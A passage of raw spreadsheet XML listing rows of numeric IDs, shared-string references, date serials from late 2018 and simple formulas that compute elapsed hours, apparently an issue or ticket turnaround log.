      <c r="D1198" t="s">
        <v>7</v>
      </c>
      <c r="E1198" s="1">
        <v>43387.94222222222</v>
      </c>
      <c r="F1198" s="1">
        <v>43392.679895833331</v>
      </c>
      <c r="G1198" t="s">
        <v>3040</v>
      </c>
      <c r="H1198" t="str">
        <f>TEXT(F1198-E1198,"[h]")</f>
        <v>113</v>
      </c>
    </row>
    <row r="1199" spans="1:8" hidden="1">
      <c r="A1199" t="s">
        <v>3399</v>
      </c>
      <c r="B1199">
        <v>12174</v>
      </c>
      <c r="C1199" t="s">
        <v>3400</v>
      </c>
      <c r="D1199" t="s">
        <v>7</v>
      </c>
      <c r="E1199" s="1">
        <v>43387.883587962962</v>
      </c>
      <c r="F1199" s="1">
        <v>43388.222129629627</v>
      </c>
      <c r="G1199" t="s">
        <v>831</v>
      </c>
      <c r="H1199" t="str">
        <f>TEXT(F1199-E1199,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1200" spans="1:8" hidden="1">
      <c r="A1200" t="s">
        <v>3401</v>
      </c>
      <c r="B1200">
        <v>12173</v>
      </c>
      <c r="C1200" t="s">
        <v>3402</v>
      </c>
      <c r="D1200" t="s">
        <v>7</v>
      </c>
      <c r="E1200" s="1">
        <v>43387.865567129629</v>
      </c>
      <c r="F1200" s="1">
        <v>43389.136956018519</v>
      </c>
      <c r="G1200" t="s">
        <v>831</v>
      </c>
      <c r="H1200" t="str">
        <f>TEXT(F1200-E1200,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1201" spans="1:8" hidden="1">
      <c r="A1201" t="s">
        <v>1772</v>
      </c>
      <c r="B1201">
        <v>12170</v>
      </c>
      <c r="C1201" t="s">
        <v>3403</v>
      </c>
      <c r="D1201" t="s">
        <v>7</v>
      </c>
      <c r="E1201" s="1">
        <v>43387.735439814816</v>
      </c>
      <c r="F1201" s="1">
        <v>43387.960173611114</v>
      </c>
      <c r="G1201" t="s">
        <v>3404</v>
      </c>
      <c r="H1201" t="str">
        <f>TEXT(F1201-E1201,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1202" spans="1:8" hidden="1">
      <c r="A1202" t="s">
        <v>3405</v>
      </c>
      <c r="B1202">
        <v>12166</v>
      </c>
      <c r="C1202" t="s">
        <v>3406</v>
      </c>
      <c r="D1202" t="s">
        <v>7</v>
      </c>
      <c r="E1202" s="1">
        <v>43387.467546296299</v>
      </c>
      <c r="F1202" s="1">
        <v>43389.108958333331</v>
      </c>
      <c r="G1202" t="s">
        <v>831</v>
      </c>
      <c r="H1202" t="str">
        <f>TEXT(F1202-E1202,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="1203" spans="1:8" hidden="1">
      <c r="A1203" t="s">
        <v>3407</v>
      </c>
      <c r="B1203">
        <v>12165</v>
      </c>
      <c r="C1203" t="s">
        <v>3408</v>
      </c>
      <c r="D1203" t="s">
        <v>7</v>
      </c>
      <c r="E1203" s="1">
        <v>43386.839942129627</v>
      </c>
      <c r="F1203" s="1">
        <v>43388.254849537036</v>
      </c>
      <c r="G1203" t="s">
        <v>1305</v>
      </c>
      <c r="H1203" t="str">
        <f>TEXT(F1203-E1203,"[h]")</f>
        <v>33</v>
      </c>
    </row>
    <row r="1204" spans="1:8" hidden="1">
      <c r="A1204" t="s">
        <v>3409</v>
      </c>
      <c r="B1204">
        <v>12163</v>
      </c>
      <c r="C1204" t="s">
        <v>3410</v>
      </c>
      <c r="D1204" t="s">
        <v>7</v>
      </c>
      <c r="E1204" s="1">
        <v>43386.185740740744</v>
      </c>
      <c r="F1204" s="1">
        <v>43399.036412037036</v>
      </c>
      <c r="G1204" t="s">
        <v>3040</v>
      </c>
      <c r="H1204" t="str">
        <f>TEXT(F1204-E1204,"[h]")</f>
        <v>308</v>
      </c>
    </row>
    <row r="1205" spans="1:8">
      <c r="A1205" t="s">
        <v>3411</v>
      </c>
      <c r="B1205">
        <v>12162</v>
      </c>
      <c r="C1205" t="s">
        <v>3412</v>
      </c>
      <c r="D1205" t="s">
        <v>7</v>
      </c>
      <c r="E1205" s="1">
        <v>43386.134398148148</v>
      </c>
      <c r="F1205" s="1">
        <v>43400.680046296293</v>
      </c>
      <c r="G1205" t="s">
        <v>3413</v>
      </c>
      <c r="H1205" t="str">
        <f>TEXT(F1205-E1205,"[h]")</f>
        <v>349</v>
      </c>
    </row>
    <row r="1206" spans="1:8" hidden="1">
      <c r="A1206" t="s">
        <v>3414</v>
      </c>
      <c r="B1206">
        <v>12159</v>
      </c>
      <c r="C1206" t="s">
        <v>3415</v>
      </c>
      <c r="D1206" t="s">
        <v>7</v>
      </c>
      <c r="E1206" s="1">
        <v>43385.725555555553</v>
      </c>
      <c r="F1206" s="1">
        <v>43390.865636574075</v>
      </c>
      <c r="G1206" t="s">
        <v>43</v>
      </c>
      <c r="H1206" t="str">
        <f>TEXT(F1206-E1206,"[h]")</f>
        <v>123</v>
      </c>
    </row>
    <row r="1207" spans="1:8" hidden="1">
      <c r="A1207" t="s">
        <v>3416</v>
      </c>
      <c r="B1207">
        <v>12158</v>
      </c>
      <c r="C1207" t="s">
        <v>3417</v>
      </c>
      <c r="D1207" t="s">
        <v>7</v>
      </c>
      <c r="E1207" s="1">
        <v>43385.659317129626</v>
      </c>
      <c r="F1207" s="1">
        <v>43390.726018518515</v>
      </c>
      <c r="G1207" t="s">
        <v>55</v>
      </c>
      <c r="H1207" t="str">
        <f>TEXT(F1207-E1207,"[h]")</f>
        <v>121</v>
      </c>
    </row>
    <row r="1208" spans="1:8" hidden="1">
      <c r="A1208" t="s">
        <v>3418</v>
      </c>
      <c r="B1208">
        <v>12157</v>
      </c>
      <c r="C1208" t="s">
        <v>3419</v>
      </c>
      <c r="D1208" t="s">
        <v>7</v>
      </c>
      <c r="E1208" s="1">
        <v>43385.593356481484</v>
      </c>
      <c r="F1208" s="1">
        <v>43404.854930555557</v>
      </c>
      <c r="G1208" t="s">
        <v>258</v>
      </c>
      <c r="H1208" t="str">
        <f>TEXT(F1208-E1208,"[h]")</f>
        <v>462</v>
      </c>
    </row>
    <row r="1209" spans="1:8">
      <c r="A1209" t="s">
        <v>3420</v>
      </c>
      <c r="B1209">
        <v>12156</v>
      </c>
      <c r="C1209" t="s">
        <v>3421</v>
      </c>
      <c r="D1209" t="s">
        <v>7</v>
      </c>
      <c r="E1209" s="1">
        <v>43385.548159722224</v>
      </c>
      <c r="F1209" s="1">
        <v>43441.82712962963</v>
      </c>
      <c r="G1209" t="s">
        <v>16</v>
      </c>
      <c r="H1209" t="str">
        <f>TEXT(F1209-E1209,"[h]")</f>
        <v>1350</v>
      </c>
    </row>
    <row r="1210" spans="1:8" hidden="1">
      <c r="A1210" t="s">
        <v>1772</v>
      </c>
      <c r="B1210">
        <v>12155</v>
      </c>
      <c r="C1210" t="s">
        <v>3422</v>
      </c>
      <c r="D1210" t="s">
        <v>7</v>
      </c>
      <c r="E1210" s="1">
        <v>43385.220937500002</v>
      </c>
      <c r="F1210" s="1">
        <v>43389.127743055556</v>
      </c>
      <c r="G1210" t="s">
        <v>174</v>
      </c>
      <c r="H1210" t="str">
        <f>TEXT(F1210-E1210,"[h]")</f>
        <v>93</v>
      </c>
    </row>
    <row r="1211" spans="1:8" hidden="1">
      <c r="A1211" t="s">
        <v>3423</v>
      </c>
      <c r="B1211">
        <v>12154</v>
      </c>
      <c r="C1211" t="s">
        <v>3424</v>
      </c>
      <c r="D1211" t="s">
        <v>7</v>
      </c>
      <c r="E1211" s="1">
        <v>43385.054074074076</v>
      </c>
      <c r="F1211" s="1">
        <v>43392.651446759257</v>
      </c>
      <c r="G1211" t="s">
        <v>3040</v>
      </c>
      <c r="H1211" t="str">
        <f>TEXT(F1211-E1211,"[h]")</f>
        <v>182</v>
      </c>
    </row>
    <row r="1212" spans="1:8" hidden="1">
      <c r="A1212" t="s">
        <v>3425</v>
      </c>
      <c r="B1212">
        <v>12153</v>
      </c>
      <c r="C1212" t="s">
        <v>3426</v>
      </c>
      <c r="D1212" t="s">
        <v>7</v>
      </c>
      <c r="E1212" s="1">
        <v>43385.030844907407</v>
      </c>
      <c r="F1212" s="1">
        <v>43390.867581018516</v>
      </c>
      <c r="G1212" t="s">
        <v>3427</v>
      </c>
      <c r="H1212" t="str">
        <f>TEXT(F1212-E1212,"[h]")</f>
        <v>140</v>
      </c>
    </row>
    <row r="1213" spans="1:8" hidden="1">
      <c r="A1213" t="s">
        <v>3428</v>
      </c>
      <c r="B1213">
        <v>12152</v>
      </c>
      <c r="C1213" t="s">
        <v>3429</v>
      </c>
      <c r="D1213" t="s">
        <v>7</v>
      </c>
      <c r="E1213" s="1">
        <v>43384.847627314812</v>
      </c>
      <c r="F1213" s="1">
        <v>43520.82576388889</v>
      </c>
      <c r="G1213" t="s">
        <v>3430</v>
      </c>
      <c r="H1213" t="str">
        <f>TEXT(F1213-E1213,"[h]")</f>
        <v>3263</v>
      </c>
    </row>
    <row r="1214" spans="1:8" hidden="1">
      <c r="A1214" t="s">
        <v>3431</v>
      </c>
      <c r="B1214">
        <v>12151</v>
      </c>
      <c r="C1214" t="s">
        <v>3432</v>
      </c>
      <c r="D1214" t="s">
        <v>7</v>
      </c>
      <c r="E1214" s="1">
        <v>43384.784560185188</v>
      </c>
      <c r="F1214" s="1">
        <v>43389.126550925925</v>
      </c>
      <c r="G1214" t="s">
        <v>55</v>
      </c>
      <c r="H1214" t="str">
        <f>TEXT(F1214-E1214,"[h]")</f>
        <v>104</v>
      </c>
    </row>
    <row r="1215" spans="1:8" hidden="1">
      <c r="A1215" t="s">
        <v>3433</v>
      </c>
      <c r="B1215">
        <v>12148</v>
      </c>
      <c r="C1215" t="s">
        <v>3434</v>
      </c>
      <c r="D1215" t="s">
        <v>7</v>
      </c>
      <c r="E1215" s="1">
        <v>43384.663715277777</v>
      </c>
      <c r="F1215" s="1">
        <v>43386.907222222224</v>
      </c>
      <c r="G1215" t="s">
        <v>3435</v>
      </c>
      <c r="H1215" t="str">
        <f>TEXT(F1215-E1215,"[h]")</f>
        <v>53</v>
      </c>
    </row>
    <row r="1216" spans="1:8" hidden="1">
      <c r="A1216" t="s">
        <v>3436</v>
      </c>
      <c r="B1216">
        <v>12147</v>
      </c>
      <c r="C1216" t="s">
        <v>3437</v>
      </c>
      <c r="D1216" t="s">
        <v>7</v>
      </c>
      <c r="E1216" s="1">
        <v>43384.585173611114</v>
      </c>
      <c r="F1216" s="1">
        <v>43384.766250000001</v>
      </c>
      <c r="G1216" t="s">
        <v>28</v>
      </c>
      <c r="H1216" t="str">
        <f>TEXT(F1216-E1216,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1217" spans="1:8" hidden="1">
      <c r="B1217">
        <v>12146</v>
      </c>
      <c r="C1217" t="s">
        <v>3329</v>
      </c>
      <c r="D1217" t="s">
        <v>7</v>
      </c>
      <c r="E1217" s="1">
        <v>43384.580891203703</v>
      </c>
      <c r="F1217" s="1">
        <v>43384.681828703702</v>
      </c>
      <c r="G1217" t="s">
        <v>174</v>
      </c>
      <c r="H1217" t="str">
        <f>TEXT(F1217-E1217,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1218" spans="1:8" hidden="1">
      <c r="A1218" t="s">
        <v>3438</v>
      </c>
      <c r="B1218">
        <v>12145</v>
      </c>
      <c r="C1218" t="s">
        <v>3439</v>
      </c>
      <c r="D1218" t="s">
        <v>7</v>
      </c>
      <c r="E1218" s="1">
        <v>43384.552291666667</v>
      </c>
      <c r="F1218" s="1">
        <v>43388.699594907404</v>
      </c>
      <c r="G1218" t="s">
        <v>28</v>
      </c>
      <c r="H1218" t="str">
        <f>TEXT(F1218-E1218,"[h]")</f>
        <v>99</v>
      </c>
    </row>
    <row r="1219" spans="1:8" hidden="1">
      <c r="A1219" t="s">
        <v>3440</v>
      </c>
      <c r="B1219">
        <v>12141</v>
      </c>
      <c r="C1219" t="s">
        <v>3441</v>
      </c>
      <c r="D1219" t="s">
        <v>7</v>
      </c>
      <c r="E1219" s="1">
        <v>43384.052881944444</v>
      </c>
      <c r="F1219" s="1">
        <v>43384.205081018517</v>
      </c>
      <c r="G1219" t="s">
        <v>66</v>
      </c>
      <c r="H1219" t="str">
        <f>TEXT(F1219-E1219,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1220" spans="1:8" hidden="1">
      <c r="A1220" t="s">
        <v>3442</v>
      </c>
      <c r="B1220">
        <v>12140</v>
      </c>
      <c r="C1220" t="s">
        <v>3443</v>
      </c>
      <c r="D1220" t="s">
        <v>7</v>
      </c>
      <c r="E1220" s="1">
        <v>43384.025636574072</v>
      </c>
      <c r="F1220" s="1">
        <v>43384.909050925926</v>
      </c>
      <c r="G1220" t="s">
        <v>3444</v>
      </c>
      <c r="H1220" t="str">
        <f>TEXT(F1220-E1220,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="1221" spans="1:8" hidden="1">
      <c r="A1221" t="s">
        <v>3445</v>
      </c>
      <c r="B1221">
        <v>12138</v>
      </c>
      <c r="C1221" t="s">
        <v>3446</v>
      </c>
      <c r="D1221" t="s">
        <v>7</v>
      </c>
      <c r="E1221" s="1">
        <v>43383.917604166665</v>
      </c>
      <c r="F1221" s="1">
        <v>43384.556990740741</v>
      </c>
      <c r="G1221" t="s">
        <v>2631</v>
      </c>
      <c r="H1221" t="str">
        <f>TEXT(F1221-E1221,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1222" spans="1:8" hidden="1">
      <c r="A1222" t="s">
        <v>3447</v>
      </c>
      <c r="B1222">
        <v>12137</v>
      </c>
      <c r="C1222" t="s">
        <v>3448</v>
      </c>
      <c r="D1222" t="s">
        <v>7</v>
      </c>
      <c r="E1222" s="1">
        <v>43383.905358796299</v>
      </c>
      <c r="F1222" s="1">
        <v>43384.558935185189</v>
      </c>
      <c r="G1222" t="s">
        <v>2631</v>
      </c>
      <c r="H1222" t="str">
        <f>TEXT(F1222-E1222,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1223" spans="1:8" hidden="1">
      <c r="A1223" t="s">
        <v>3449</v>
      </c>
      <c r="B1223">
        <v>12135</v>
      </c>
      <c r="C1223" t="s">
        <v>3450</v>
      </c>
      <c r="D1223" t="s">
        <v>7</v>
      </c>
      <c r="E1223" s="1">
        <v>43383.818414351852</v>
      </c>
      <c r="F1223" s="1">
        <v>43392.367222222223</v>
      </c>
      <c r="G1223" t="s">
        <v>3451</v>
      </c>
      <c r="H1223" t="str">
        <f>TEXT(F1223-E1223,"[h]")</f>
        <v>205</v>
      </c>
    </row>
    <row r="1224" spans="1:8" hidden="1">
      <c r="A1224" t="s">
        <v>3452</v>
      </c>
      <c r="B1224">
        <v>12134</v>
      </c>
      <c r="C1224" t="s">
        <v>3453</v>
      </c>
      <c r="D1224" t="s">
        <v>7</v>
      </c>
      <c r="E1224" s="1">
        <v>43383.794212962966</v>
      </c>
      <c r="F1224" s="1">
        <v>43384.228668981479</v>
      </c>
      <c r="G1224" t="s">
        <v>255</v>
      </c>
      <c r="H1224" t="str">
        <f>TEXT(F1224-E1224,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1225" spans="1:8" hidden="1">
      <c r="A1225" t="s">
        <v>3454</v>
      </c>
      <c r="B1225">
        <v>12133</v>
      </c>
      <c r="C1225" t="s">
        <v>3455</v>
      </c>
      <c r="D1225" t="s">
        <v>7</v>
      </c>
      <c r="E1225" s="1">
        <v>43383.570983796293</v>
      </c>
      <c r="F1225" s="1">
        <v>43383.732974537037</v>
      </c>
      <c r="G1225" t="s">
        <v>3456</v>
      </c>
      <c r="H1225" t="str">
        <f>TEXT(F1225-E1225,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1226" spans="1:8">
      <c r="A1226" t="s">
        <v>3457</v>
      </c>
      <c r="B1226">
        <v>12131</v>
      </c>
      <c r="C1226" t="s">
        <v>3458</v>
      </c>
      <c r="D1226" t="s">
        <v>7</v>
      </c>
      <c r="E1226" s="1">
        <v>43383.260115740741</v>
      </c>
      <c r="F1226" s="1">
        <v>43383.490636574075</v>
      </c>
      <c r="G1226" t="s">
        <v>13</v>
      </c>
      <c r="H1226" t="str">
        <f>TEXT(F1226-E1226,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1227" spans="1:8" hidden="1">
      <c r="A1227" t="s">
        <v>3459</v>
      </c>
      <c r="B1227">
        <v>12130</v>
      </c>
      <c r="C1227" t="s">
        <v>3460</v>
      </c>
      <c r="D1227" t="s">
        <v>7</v>
      </c>
      <c r="E1227" s="1">
        <v>43383.181145833332</v>
      </c>
      <c r="F1227" s="1">
        <v>43536.654606481483</v>
      </c>
      <c r="G1227" t="s">
        <v>115</v>
      </c>
      <c r="H1227" t="str">
        <f>TEXT(F1227-E1227,"[h]")</f>
        <v>3683</v>
      </c>
    </row>
    <row r="1228" spans="1:8" hidden="1">
      <c r="A1228" t="s">
        <v>2563</v>
      </c>
      <c r="B1228">
        <v>12129</v>
      </c>
      <c r="C1228" t="s">
        <v>3461</v>
      </c>
      <c r="D1228" t="s">
        <v>7</v>
      </c>
      <c r="E1228" s="1">
        <v>43383.064618055556</v>
      </c>
      <c r="F1228" s="1">
        <v>43753.855416666665</v>
      </c>
      <c r="G1228" t="s">
        <v>255</v>
      </c>
      <c r="H1228" t="str">
        <f>TEXT(F1228-E1228,"[h]")</f>
        <v>8898</v>
      </c>
    </row>
    <row r="1229" spans="1:8" hidden="1">
      <c r="A1229" t="s">
        <v>3462</v>
      </c>
      <c r="B1229">
        <v>12128</v>
      </c>
      <c r="C1229" t="s">
        <v>3463</v>
      </c>
      <c r="D1229" t="s">
        <v>7</v>
      </c>
      <c r="E1229" s="1">
        <v>43383.010671296295</v>
      </c>
      <c r="F1229" s="1">
        <v>43383.489571759259</v>
      </c>
      <c r="G1229" t="s">
        <v>37</v>
      </c>
      <c r="H1229" t="str">
        <f>TEXT(F1229-E1229,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1230" spans="1:8">
      <c r="A1230" t="s">
        <v>3383</v>
      </c>
      <c r="B1230">
        <v>12127</v>
      </c>
      <c r="C1230" t="s">
        <v>3384</v>
      </c>
      <c r="D1230" t="s">
        <v>7</v>
      </c>
      <c r="E1230" s="1">
        <v>43382.988125000003</v>
      </c>
      <c r="F1230" s="1">
        <v>43383.490949074076</v>
      </c>
      <c r="G1230" t="s">
        <v>19</v>
      </c>
      <c r="H1230" t="str">
        <f>TEXT(F1230-E1230,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="1231" spans="1:8" hidden="1">
      <c r="A1231" t="s">
        <v>3464</v>
      </c>
      <c r="B1231">
        <v>12125</v>
      </c>
      <c r="C1231" t="s">
        <v>3465</v>
      </c>
      <c r="D1231" t="s">
        <v>7</v>
      </c>
      <c r="E1231" s="1">
        <v>43382.744895833333</v>
      </c>
      <c r="F1231" s="1">
        <v>43382.787199074075</v>
      </c>
      <c r="G1231" t="s">
        <v>1681</v>
      </c>
      <c r="H1231" t="str">
        <f>TEXT(F1231-E1231,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1232" spans="1:8">
      <c r="A1232" t="s">
        <v>3466</v>
      </c>
      <c r="B1232">
        <v>12124</v>
      </c>
      <c r="C1232" t="s">
        <v>3467</v>
      </c>
      <c r="D1232" t="s">
        <v>7</v>
      </c>
      <c r="E1232" s="1">
        <v>43382.735856481479</v>
      </c>
      <c r="F1232" s="1">
        <v>43390.683611111112</v>
      </c>
      <c r="G1232" t="s">
        <v>3468</v>
      </c>
      <c r="H1232" t="str">
        <f>TEXT(F1232-E1232,"[h]")</f>
        <v>190</v>
      </c>
    </row>
    <row r="1233" spans="1:8" hidden="1">
      <c r="A1233" t="s">
        <v>3469</v>
      </c>
      <c r="B1233">
        <v>12123</v>
      </c>
      <c r="C1233" t="s">
        <v>3470</v>
      </c>
      <c r="D1233" t="s">
        <v>7</v>
      </c>
      <c r="E1233" s="1">
        <v>43382.51421296296</v>
      </c>
      <c r="F1233" s="1">
        <v>43383.688981481479</v>
      </c>
      <c r="G1233" t="s">
        <v>536</v>
      </c>
      <c r="H1233" t="str">
        <f>TEXT(F1233-E1233,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="1234" spans="1:8" hidden="1">
      <c r="A1234" t="s">
        <v>3471</v>
      </c>
      <c r="B1234">
        <v>12121</v>
      </c>
      <c r="C1234" t="s">
        <v>3472</v>
      </c>
      <c r="D1234" t="s">
        <v>7</v>
      </c>
      <c r="E1234" s="1">
        <v>43382.323599537034</v>
      </c>
      <c r="F1234" s="1">
        <v>43392.311168981483</v>
      </c>
      <c r="G1234" t="s">
        <v>28</v>
      </c>
      <c r="H1234" t="str">
        <f>TEXT(F1234-E1234,"[h]")</f>
        <v>239</v>
      </c>
    </row>
    <row r="1235" spans="1:8" hidden="1">
      <c r="A1235" t="s">
        <v>3473</v>
      </c>
      <c r="B1235">
        <v>12120</v>
      </c>
      <c r="C1235" t="s">
        <v>3474</v>
      </c>
      <c r="D1235" t="s">
        <v>7</v>
      </c>
      <c r="E1235" s="1">
        <v>43382.149652777778</v>
      </c>
      <c r="F1235" s="1">
        <v>43403.967361111114</v>
      </c>
      <c r="G1235" t="s">
        <v>3217</v>
      </c>
      <c r="H1235" t="str">
        <f>TEXT(F1235-E1235,"[h]")</f>
        <v>523</v>
      </c>
    </row>
    <row r="1236" spans="1:8" hidden="1">
      <c r="A1236" t="s">
        <v>3475</v>
      </c>
      <c r="B1236">
        <v>12119</v>
      </c>
      <c r="C1236" t="s">
        <v>3476</v>
      </c>
      <c r="D1236" t="s">
        <v>7</v>
      </c>
      <c r="E1236" s="1">
        <v>43381.830787037034</v>
      </c>
      <c r="F1236" s="1">
        <v>43396.027881944443</v>
      </c>
      <c r="G1236" t="s">
        <v>3477</v>
      </c>
      <c r="H1236" t="str">
        <f>TEXT(F1236-E1236,"[h]")</f>
        <v>340</v>
      </c>
    </row>
    <row r="1237" spans="1:8" hidden="1">
      <c r="A1237" t="s">
        <v>3478</v>
      </c>
      <c r="B1237">
        <v>12117</v>
      </c>
      <c r="C1237" t="s">
        <v>3479</v>
      </c>
      <c r="D1237" t="s">
        <v>7</v>
      </c>
      <c r="E1237" s="1">
        <v>43381.816412037035</v>
      </c>
      <c r="F1237" s="1">
        <v>43386.009039351855</v>
      </c>
      <c r="G1237" t="s">
        <v>3480</v>
      </c>
      <c r="H1237" t="str">
        <f>TEXT(F1237-E1237,"[h]")</f>
        <v>100</v>
      </c>
    </row>
    <row r="1238" spans="1:8" hidden="1">
      <c r="A1238" t="s">
        <v>3481</v>
      </c>
      <c r="B1238">
        <v>12116</v>
      </c>
      <c r="C1238" t="s">
        <v>3482</v>
      </c>
      <c r="D1238" t="s">
        <v>7</v>
      </c>
      <c r="E1238" s="1">
        <v>43381.816342592596</v>
      </c>
      <c r="F1238" s="1">
        <v>43384.794270833336</v>
      </c>
      <c r="G1238" t="s">
        <v>3477</v>
      </c>
      <c r="H1238" t="str">
        <f>TEXT(F1238-E1238,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="1239" spans="1:8" hidden="1">
      <c r="A1239" t="s">
        <v>3483</v>
      </c>
      <c r="B1239">
        <v>12115</v>
      </c>
      <c r="C1239" t="s">
        <v>3484</v>
      </c>
      <c r="D1239" t="s">
        <v>7</v>
      </c>
      <c r="E1239" s="1">
        <v>43381.81627314815</v>
      </c>
      <c r="F1239" s="1">
        <v>43384.792430555557</v>
      </c>
      <c r="G1239" t="s">
        <v>3288</v>
      </c>
      <c r="H1239" t="str">
        <f>TEXT(F1239-E1239,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="1240" spans="1:8">
      <c r="A1240" t="s">
        <v>3485</v>
      </c>
      <c r="B1240">
        <v>12112</v>
      </c>
      <c r="C1240" t="s">
        <v>3486</v>
      </c>
      <c r="D1240" t="s">
        <v>7</v>
      </c>
      <c r="E1240" s="1">
        <v>43381.578101851854</v>
      </c>
      <c r="F1240" s="1">
        <v>43382.88013888889</v>
      </c>
      <c r="G1240" t="s">
        <v>3487</v>
      </c>
      <c r="H1240" t="str">
        <f>TEXT(F1240-E1240,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="1241" spans="1:8" hidden="1">
      <c r="A1241" t="s">
        <v>3488</v>
      </c>
      <c r="B1241">
        <v>12109</v>
      </c>
      <c r="C1241" t="s">
        <v>3489</v>
      </c>
      <c r="D1241" t="s">
        <v>7</v>
      </c>
      <c r="E1241" s="1">
        <v>43381.100219907406</v>
      </c>
      <c r="F1241" s="1">
        <v>43381.87699074074</v>
      </c>
      <c r="G1241" t="s">
        <v>1681</v>
      </c>
      <c r="H1241" t="str">
        <f>TEXT(F1241-E1241,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1242" spans="1:8" hidden="1">
      <c r="A1242" t="s">
        <v>3381</v>
      </c>
      <c r="B1242">
        <v>12108</v>
      </c>
      <c r="C1242" t="s">
        <v>3382</v>
      </c>
      <c r="D1242" t="s">
        <v>7</v>
      </c>
      <c r="E1242" s="1">
        <v>43381.069097222222</v>
      </c>
      <c r="F1242" s="1">
        <v>43383.833240740743</v>
      </c>
      <c r="G1242" t="s">
        <v>258</v>
      </c>
      <c r="H1242" t="str">
        <f>TEXT(F1242-E1242,"[h]")</f>
        <v>66</v>
      </c>
    </row>
    <row r="1243" spans="1:8" hidden="1">
      <c r="A1243" t="s">
        <v>3490</v>
      </c>
      <c r="B1243">
        <v>12106</v>
      </c>
      <c r="C1243" t="s">
        <v>3491</v>
      </c>
      <c r="D1243" t="s">
        <v>7</v>
      </c>
      <c r="E1243" s="1">
        <v>43381.046087962961</v>
      </c>
      <c r="F1243" s="1">
        <v>43381.089583333334</v>
      </c>
      <c r="G1243" t="s">
        <v>2909</v>
      </c>
      <c r="H1243" t="str">
        <f>TEXT(F1243-E1243,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1244" spans="1:8">
      <c r="A1244" t="s">
        <v>3492</v>
      </c>
      <c r="B1244">
        <v>12105</v>
      </c>
      <c r="C1244" t="s">
        <v>3493</v>
      </c>
      <c r="D1244" t="s">
        <v>7</v>
      </c>
      <c r="E1244" s="1">
        <v>43380.702800925923</v>
      </c>
      <c r="F1244" s="1">
        <v>43382.88013888889</v>
      </c>
      <c r="G1244" t="s">
        <v>16</v>
      </c>
      <c r="H1244" t="str">
        <f>TEXT(F1244-E1244,"[h]")</f>
        <v>52</v>
      </c>
    </row>
    <row r="1245" spans="1:8" hidden="1">
      <c r="A1245" t="s">
        <v>1772</v>
      </c>
      <c r="B1245">
        <v>12103</v>
      </c>
      <c r="C1245" t="s">
        <v>3494</v>
      </c>
      <c r="D1245" t="s">
        <v>7</v>
      </c>
      <c r="E1245" s="1">
        <v>43379.916944444441</v>
      </c>
      <c r="F1245" s="1">
        <v>43380.020821759259</v>
      </c>
      <c r="G1245" t="s">
        <v>174</v>
      </c>
      <c r="H1245" t="str">
        <f>TEXT(F1245-E1245,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1246" spans="1:8" hidden="1">
      <c r="A1246" t="s">
        <v>3495</v>
      </c>
      <c r="B1246">
        <v>12102</v>
      </c>
      <c r="C1246" t="s">
        <v>3496</v>
      </c>
      <c r="D1246" t="s">
        <v>7</v>
      </c>
      <c r="E1246" s="1">
        <v>43379.878784722219</v>
      </c>
      <c r="F1246" s="1">
        <v>43379.933553240742</v>
      </c>
      <c r="G1246" t="s">
        <v>55</v>
      </c>
      <c r="H1246" t="str">
        <f>TEXT(F1246-E1246,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1247" spans="1:8" hidden="1">
      <c r="A1247" t="s">
        <v>3497</v>
      </c>
      <c r="B1247">
        <v>12099</v>
      </c>
      <c r="C1247" t="s">
        <v>3498</v>
      </c>
      <c r="D1247" t="s">
        <v>7</v>
      </c>
      <c r="E1247" s="1">
        <v>43379.237685185188</v>
      </c>
      <c r="F1247" s="1">
        <v>43381.796863425923</v>
      </c>
      <c r="G1247" t="s">
        <v>3499</v>
      </c>
      <c r="H1247" t="str">
        <f>TEXT(F1247-E1247,"[h]")</f>
        <v>61</v>
      </c>
    </row>
    <row r="1248" spans="1:8" hidden="1">
      <c r="A1248" t="s">
        <v>3500</v>
      </c>
      <c r="B1248">
        <v>12097</v>
      </c>
      <c r="C1248" t="s">
        <v>3501</v>
      </c>
      <c r="D1248" t="s">
        <v>7</v>
      </c>
      <c r="E1248" s="1">
        <v>43378.961238425924</v>
      </c>
      <c r="F1248" s="1">
        <v>43542.710625</v>
      </c>
      <c r="G1248" t="s">
        <v>3502</v>
      </c>
      <c r="H1248" t="str">
        <f>TEXT(F1248-E1248,"[h]")</f>
        <v>3929</v>
      </c>
    </row>
    <row r="1249" spans="1:8" hidden="1">
      <c r="A1249" t="s">
        <v>3503</v>
      </c>
      <c r="B1249">
        <v>12093</v>
      </c>
      <c r="C1249" t="s">
        <v>3504</v>
      </c>
      <c r="D1249" t="s">
        <v>7</v>
      </c>
      <c r="E1249" s="1">
        <v>43378.644768518519</v>
      </c>
      <c r="F1249" s="1">
        <v>43380.239594907405</v>
      </c>
      <c r="G1249" t="s">
        <v>28</v>
      </c>
      <c r="H1249" t="str">
        <f>TEXT(F1249-E1249,"[h]")</f>
        <v>38</v>
      </c>
    </row>
    <row r="1250" spans="1:8" hidden="1">
      <c r="A1250" t="s">
        <v>3505</v>
      </c>
      <c r="B1250">
        <v>12092</v>
      </c>
      <c r="C1250" t="s">
        <v>3506</v>
      </c>
      <c r="D1250" t="s">
        <v>7</v>
      </c>
      <c r="E1250" s="1">
        <v>43378.600416666668</v>
      </c>
